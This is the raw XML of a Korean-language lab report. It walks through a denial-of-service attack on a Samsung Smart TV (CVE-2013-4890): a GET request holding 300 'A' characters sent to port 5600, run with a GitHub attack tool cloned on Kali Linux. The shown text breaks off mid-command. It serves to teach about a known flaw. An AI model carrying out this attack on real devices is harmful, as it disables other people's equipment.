          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XE</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>를 이용한 삼성 스마트T</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>V(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">S50C7700 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>모델)</w:t>
      </w:r>
      <w:r w:rsidR="000B49E3" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">에 대한 </w:t>
      </w:r>
      <w:r w:rsidR="000B49E3" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dos </w:t>
      </w:r>
      <w:r w:rsidR="000B49E3" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>공격이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94C087" w14:textId="25108F29" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">요청으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘A’</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>300</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>개를 설정하여 전송하면 서비스가 중지되는 취약점이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0750CE85" w14:textId="37AEF78E" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-참고 사이트</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:history="1">
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/27043</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23C38FA6" w14:textId="30632F16" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VE-2013-4890 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">취약점 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:history="1">
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4890</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E20FBCE" w14:textId="77777777" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA81605" w14:textId="43209978" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5307DCCB" wp14:editId="2659A2C6">
            <wp:extent cx="6840001" cy="2381063"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="196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238106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AC7080" w14:textId="59E235E2" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22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메인 페이지에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>번 C</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">rash </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>링크를 클릭하면 소스코드를 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38603295" w14:textId="77777777" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21459EAE" w14:textId="48D1FAAF" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="00192F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A8AE557" wp14:editId="2C0A8C2B">
            <wp:extent cx="6840001" cy="620868"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="273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62086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100AED" w14:textId="3526F13B" w:rsidR="009678B1" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>600</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>번 포트로</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>300</w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">개의 </w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>‘A</w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>’ GET</w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 요청에 삽입하여 전송하는 공격 코드이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C241B7C" w14:textId="1951FC98" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79541C1F" w14:textId="2AC7C75A" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7C1A46" w14:textId="19688356" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3" w:rsidP="000B49E3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lastRenderedPageBreak/>
        <w:t>본 취약점은 실제 삼성 스마트T</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">V </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모델에 대한 실습을 진행하기 어려우므로 외부 사이트</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>hub)</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 해당 취약점에 대한 실습을 해볼 수 있는 툴을 다운로드 받아 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ali linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격 과정만 진행하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534439F" w14:textId="77777777" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="0088257A" w:rsidP="000B49E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFA4AAE" w14:textId="153664C6" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="000B49E3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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4B5451" wp14:editId="4D160B61">
            <wp:extent cx="6840001" cy="1935269"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2730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93526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C4CE4E" w14:textId="34448524" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="0088257A" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kali#</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="22"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/r00t-3xp10it/Samsung-TV-Denial-of-Service-DoS-Attack.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="138A7C35" w14:textId="77777777" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="0088257A" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E46F245" w14:textId="2FF0FA82" w:rsidR="000B49E3" w:rsidRPr="0035631E" w:rsidRDefault="0088257A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E80C02" wp14:editId="29745CCD">
            <wp:extent cx="6840001" cy="401660"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1778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40166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6A2E8A" w14:textId="6579DEF4" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="0088257A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클론이 완료되고 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 입력하면 S</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">amsung-TV-Denial-of-Service-Dos-ATTack </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>디렉터리를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볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B313A" w14:textId="6BF57E1F" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="0088257A" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143A3C97" w14:textId="4F12471D" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="0088257A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B3EFE94" wp14:editId="647DD8EA">
            <wp:extent cx="6840001" cy="1184660"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1587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1184660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4C241A" w14:textId="77777777" w:rsidR="009C2BF6" w:rsidRPr="0035631E" w:rsidRDefault="0088257A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해당 디렉터리로 이동하여 리스트를 확인하면 파이썬 </w:t>
      </w:r>
      <w:r w:rsidR="009C2BF6" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일이 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD4E2D" w14:textId="77777777" w:rsidR="009C2BF6" w:rsidRPr="0035631E" w:rsidRDefault="009C2BF6" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04DA86CA" w14:textId="77777777" w:rsidR="009C2BF6" w:rsidRPr="0035631E" w:rsidRDefault="009C2BF6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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E319C0" wp14:editId="6B02C3D5">
            <wp:extent cx="6840001" cy="635769"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1206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63576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8A756F" w14:textId="1A68EAB7" w:rsidR="009C2BF6" w:rsidRPr="0035631E" w:rsidRDefault="009C2BF6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chmod 755</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 권한상승</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7752AC26" w14:textId="77777777" w:rsidR="009C2BF6" w:rsidRPr="0035631E" w:rsidRDefault="009C2BF6" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117B3530" w14:textId="7F492B4D" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="009C2BF6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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="350F297A" wp14:editId="39AE087F">
            <wp:extent cx="6840001" cy="411898"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2667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41189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B24CF" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4031B8" w14:textId="1C6BA97D" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="009C2BF6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패킷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분석 프로그램을 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951D36F" w14:textId="2BD70454" w:rsidR="0026544D" w:rsidRPr="0035631E" w:rsidRDefault="0026544D" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CDD96A" w14:textId="5E1A9B9C" w:rsidR="0026544D" w:rsidRPr="0035631E" w:rsidRDefault="0026544D" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD0A349" w14:textId="77777777" w:rsidR="0026544D" w:rsidRPr="0035631E" w:rsidRDefault="0026544D" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603308E9" w14:textId="600B3FB3" w:rsidR="0026544D" w:rsidRPr="0035631E" w:rsidRDefault="0026544D" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0462A5BC" wp14:editId="05A75FDE">
            <wp:extent cx="6840001" cy="784589"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="158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784589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E5B982" w14:textId="16915EFD" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="0026544D" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali# </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
